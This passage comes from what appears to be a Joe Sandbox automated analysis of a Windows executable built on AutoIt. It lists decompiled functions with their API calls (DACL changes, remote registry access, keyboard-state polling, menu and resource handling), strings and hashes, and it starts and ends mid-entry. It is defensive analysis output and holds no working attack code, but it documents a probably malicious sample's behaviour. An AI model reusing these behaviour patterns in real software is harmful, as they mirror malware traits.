                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: bc9d1cb3d0c1f0440e5d24d80ebd129924108eab40d6190478c99fcbf98c0a7a
                                                                    • Instruction ID: 90decd540377a394a6f82b95436d5fddbec7ce1befaf8f462f308346a81c1918
                                                                    • Opcode Fuzzy Hash: bc9d1cb3d0c1f0440e5d24d80ebd129924108eab40d6190478c99fcbf98c0a7a
                                                                    • Instruction Fuzzy Hash: 6A817E71608301EFD710EF14C888AABBBEAFB89314F14462EF99597291D771D905CBA2
                                                                    APIs
                                                                      • Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
                                                                      • Part of subcall function 0065ABBB: GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
                                                                      • Part of subcall function 0065ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
                                                                      • Part of subcall function 0065ABBB: HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
                                                                      • Part of subcall function 0065ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E
                                                                      • Part of subcall function 0065AC56: GetProcessHeap.KERNEL32(00000008,0065A6B5,00000000,00000000,?,0065A6B5,?), ref: 0065AC62
                                                                      • Part of subcall function 0065AC56: HeapAlloc.KERNEL32(00000000,?,0065A6B5,?), ref: 0065AC69
                                                                      • Part of subcall function 0065AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0065A6B5,?), ref: 0065AC7A
                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0065A8CB
                                                                    • _memset.LIBCMT ref: 0065A8E0
                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065A8FF
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0065A910
                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0065A94D
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0065A969
                                                                    • GetLengthSid.ADVAPI32(?), ref: 0065A986
                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0065A995
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0065A99C
                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065A9BD
                                                                    • CopySid.ADVAPI32(00000000), ref: 0065A9C4
                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0065A9F5
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0065AA1B
                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0065AA2F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                    • String ID:
                                                                    • API String ID: 3996160137-0
                                                                    • Opcode ID: 849e5c61876667bbba91f7ab8227ed92150cf360ee6668b81b07afc7489e1f7e
                                                                    • Instruction ID: 8114e4cd8a16bc929f084f19c49467efceb1c16f60a4a7d0853714f4b7fdd67b
                                                                    • Opcode Fuzzy Hash: 849e5c61876667bbba91f7ab8227ed92150cf360ee6668b81b07afc7489e1f7e
                                                                    • Instruction Fuzzy Hash: AE513C71900219AFDF10DF94DD85AEEBB7AFF05301F04821AF956A7290DB359A09CF61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-2391861430
                                                                    • Opcode ID: ed82c39bbf3ec5ba3cf460b2c181a39db2afaa4c1e3a193e9d44b0b3aa2c70fd
                                                                    • Instruction ID: 0de0a2e7a1e5ad22c2003d80a075ea4f32ad040965c1762dce9f9b5623402677
                                                                    • Opcode Fuzzy Hash: ed82c39bbf3ec5ba3cf460b2c181a39db2afaa4c1e3a193e9d44b0b3aa2c70fd
                                                                    • Instruction Fuzzy Hash: EA51B031800A19BBCB54EBA0DD86EEEB77AAF05350F10006AF405761A2EB316F59DF65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString__swprintf_wprintf
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 2889450990-3420473620
                                                                    • Opcode ID: c3dd2ff546671afd050421591e6a5b7e9f8a96b41623c3fbf8b0fbd86d95a141
                                                                    • Instruction ID: b577c2302ed27187541c1a7161f49d9ca191d6d59889fd4fc351070d93fcc868
                                                                    • Opcode Fuzzy Hash: c3dd2ff546671afd050421591e6a5b7e9f8a96b41623c3fbf8b0fbd86d95a141
                                                                    • Instruction Fuzzy Hash: 2051D171900A19AACF14EBE0DD46EEEB77AAF05340F10006AF40677192EB706F99DF65
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: $Em$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 3964851224-3613096251
                                                                    • Opcode ID: bc8b1f698e50a254e708cb890e9da22e8d6ef39da18b8fa15d5dce6fff6e33b2
                                                                    • Instruction ID: abc4d16b10f469160e60c9818fc1c45127584725c402ce13c60da79216eb191e
                                                                    • Opcode Fuzzy Hash: bc8b1f698e50a254e708cb890e9da22e8d6ef39da18b8fa15d5dce6fff6e33b2
                                                                    • Instruction Fuzzy Hash: B441403051025A8BCF54FF10E851AEE3767EF22740F106959EC652B392EB71AE0ACB64
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 006655D7
                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00665664
                                                                    • GetMenuItemCount.USER32(006E1708), ref: 006656ED
                                                                    • DeleteMenu.USER32(006E1708,00000005,00000000,000000F5,?,?), ref: 0066577D
                                                                    • DeleteMenu.USER32(006E1708,00000004,00000000), ref: 00665785
                                                                    • DeleteMenu.USER32(006E1708,00000006,00000000), ref: 0066578D
                                                                    • DeleteMenu.USER32(006E1708,00000003,00000000), ref: 00665795
                                                                    • GetMenuItemCount.USER32(006E1708), ref: 0066579D
                                                                    • SetMenuItemInfoW.USER32(006E1708,00000004,00000000,00000030), ref: 006657D3
                                                                    • GetCursorPos.USER32(?), ref: 006657DD
                                                                    • SetForegroundWindow.USER32(00000000), ref: 006657E6
                                                                    • TrackPopupMenuEx.USER32(006E1708,00000000,?,00000000,00000000,00000000), ref: 006657F9
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00665805
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 3993528054-0
                                                                    • Opcode ID: edd00755b4d118992774ef390ee1393770451aff0b64ce3f4ce8eb077eb6a32a
                                                                    • Instruction ID: 009cbfd8c29d5fcb9d27716cc5e8f6e6ed36a1aa481027953121803dc8413408
                                                                    • Opcode Fuzzy Hash: edd00755b4d118992774ef390ee1393770451aff0b64ce3f4ce8eb077eb6a32a
                                                                    • Instruction Fuzzy Hash: 6671E370640615BFEB209F54CC4AFEABF66FF01364F240209F516AA2E1C7B16C10DBA4
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0065A1DC
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0065A211
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0065A22D
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0065A249
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0065A273
                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0065A29B
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065A2A6
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0065A2AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 1687751970-22481851
                                                                    • Opcode ID: 2384893c52f65fd2473d3ab0ed976d9dbee28888696e11bf0f8377b8bacb8c38
                                                                    • Instruction ID: a251db24ed676e7767a74815b0a958fddac9a5197373c096f8035a903aa8dba6
                                                                    • Opcode Fuzzy Hash: 2384893c52f65fd2473d3ab0ed976d9dbee28888696e11bf0f8377b8bacb8c38
                                                                    • Instruction Fuzzy Hash: 8F41F876C10629ABDB21EBA4EC95DEDB77ABF14350F044169F902A3260EA709E09CF54
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 006667FD
                                                                    • __swprintf.LIBCMT ref: 0066680A
                                                                      • Part of subcall function 0064172B: __woutput_l.LIBCMT ref: 00641784
                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00666834
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00666840
                                                                    • LockResource.KERNEL32(00000000), ref: 0066684D
                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0066686D
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0066687F
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0066688E
                                                                    • LockResource.KERNEL32(?), ref: 0066689A
                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006668F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                    • String ID: 5m
                                                                    • API String ID: 1433390588-1963150287
                                                                    • Opcode ID: 3b6eba522e28dee20956446ada0293cc964ad7e8582bde4c237a1eb0d0cb7dbd
                                                                    • Instruction ID: e45f1516dd9141c301c90a748f0f608b7297057705bbbe7649e9e96172ac0085
                                                                    • Opcode Fuzzy Hash: 3b6eba522e28dee20956446ada0293cc964ad7e8582bde4c237a1eb0d0cb7dbd
                                                                    • Instruction Fuzzy Hash: 55318E7190025AABDB10AF71ED45AFE7BAAEF09344B108429F912D7250E730DA51DBB4
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006936F4,00000010,?,Bad directive syntax error,006BDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006625D6
                                                                    • LoadStringW.USER32(00000000,?,006936F4,00000010), ref: 006625DD
                                                                    • _wprintf.LIBCMT ref: 00662610
                                                                    • __swprintf.LIBCMT ref: 00662632
                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006626A1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                    • API String ID: 1080873982-4153970271
                                                                    • Opcode ID: bc0f9c320a4316a7d0d1c7227ff6ef701efbf61ad6b8e5bf6d24ced47f37afd1
                                                                    • Instruction ID: dd420c900ea8b97f89a92251be3308c1a6dbbb6187f0b85012f33d6d60c9fef5
                                                                    • Opcode Fuzzy Hash: bc0f9c320a4316a7d0d1c7227ff6ef701efbf61ad6b8e5bf6d24ced47f37afd1
                                                                    • Instruction Fuzzy Hash: 06218231C0062ABFCF11BF90DC0AEEE773ABF19304F000459F506661A2DA71AA64DF55
                                                                    APIs
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00667B42
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00667B58
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00667B69
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00667B7B
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00667B8C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: SendString
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 890592661-1007645807
                                                                    • Opcode ID: df235194103938666c4c6f9bef7ef2fe970a81cee2740e2f5d12e51190f4b2a8
                                                                    • Instruction ID: 56c820bfa04a331d844c1577a8dd42fb608c9ef68f5d5f9e3c24c81a5518a473
                                                                    • Opcode Fuzzy Hash: df235194103938666c4c6f9bef7ef2fe970a81cee2740e2f5d12e51190f4b2a8
                                                                    • Instruction Fuzzy Hash: 371104B0A4067A79D720B761DC4ADFF7B7EEBD1B10F00042AB411A32C0DA700A44CAB5
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 00667794
                                                                      • Part of subcall function 0063DC38: timeGetTime.WINMM(?,75A8B400,006958AB), ref: 0063DC3C
                                                                    • Sleep.KERNEL32(0000000A), ref: 006677C0
                                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006677E4
                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00667806
                                                                    • SetActiveWindow.USER32 ref: 00667825
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00667833
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00667852
                                                                    • Sleep.KERNEL32(000000FA), ref: 0066785D
                                                                    • IsWindow.USER32 ref: 00667869
                                                                    • EndDialog.USER32(00000000), ref: 0066787A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: ed6081eeacfa54dc8b60615c00d15c3d685071ed5b824cc7eef39f106c93d5e7
                                                                    • Instruction ID: 3b16a89a63d55d7e2808e5f6684b4973bde8d733d8168a9a3ad08c444b14d52d
                                                                    • Opcode Fuzzy Hash: ed6081eeacfa54dc8b60615c00d15c3d685071ed5b824cc7eef39f106c93d5e7
                                                                    • Instruction Fuzzy Hash: 362135B0214385BFE7006B20EC8DE6A3F6BFB05348F042068F50687762DB71AD00DE24
                                                                    APIs
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                    • CoInitialize.OLE32(00000000), ref: 0067034B
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006703DE
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 006703F2
                                                                    • CoCreateInstance.OLE32(006ADA8C,00000000,00000001,006D3CF8,?), ref: 0067043E
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006704AD
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00670505
                                                                    • _memset.LIBCMT ref: 00670542
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0067057E
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006705A1
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 006705A8
                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006705DF
                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 006705E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                    • String ID:
                                                                    • API String ID: 1246142700-0
                                                                    • Opcode ID: 7027d3035c0ab489e8fed06774ac1a24082367240f879cc8da57426f504a1c0d
                                                                    • Instruction ID: dce620a16b3d37bae9312065482f8bc44ae26226e9af9fbc0f19a367bdd2e174
                                                                    • Opcode Fuzzy Hash: 7027d3035c0ab489e8fed06774ac1a24082367240f879cc8da57426f504a1c0d
                                                                    • Instruction Fuzzy Hash: 4CB1D975A00119EFDB04DFA4C988DAEBBBAEF48314B148499E90AEB251D730ED41CF64
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00662ED6
                                                                    • SetKeyboardState.USER32(?), ref: 00662F41
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00662F61
                                                                    • GetKeyState.USER32(000000A0), ref: 00662F78
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00662FA7
                                                                    • GetKeyState.USER32(000000A1), ref: 00662FB8
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00662FE4
                                                                    • GetKeyState.USER32(00000011), ref: 00662FF2
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0066301B
                                                                    • GetKeyState.USER32(00000012), ref: 00663029
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00663052
                                                                    • GetKeyState.USER32(0000005B), ref: 00663060
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: c4b2bc36d1866917d1f51e77ab9ce1ff08718cdeec4e864a8651f52918f1a36f
                                                                    • Instruction ID: b91ea79d6aa51e5f0edf46b33b47cebaaa074851cb076a0cfb8491a58c0820d4
                                                                    • Opcode Fuzzy Hash: c4b2bc36d1866917d1f51e77ab9ce1ff08718cdeec4e864a8651f52918f1a36f
                                                                    • Instruction Fuzzy Hash: B051FB20A04BD529FB35DBB489207EABFF65F12340F08459DC5C2563C2DA649B8CC7A6
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0065ED1E
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0065ED30
                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0065ED8E
                                                                    • GetDlgItem.USER32(?,00000002), ref: 0065ED99
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0065EDAB
                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0065EE01
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065EE0F
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0065EE20
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0065EE63
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065EE71
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0065EE8E
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0065EE9B
                                                                    Memory Dump Source
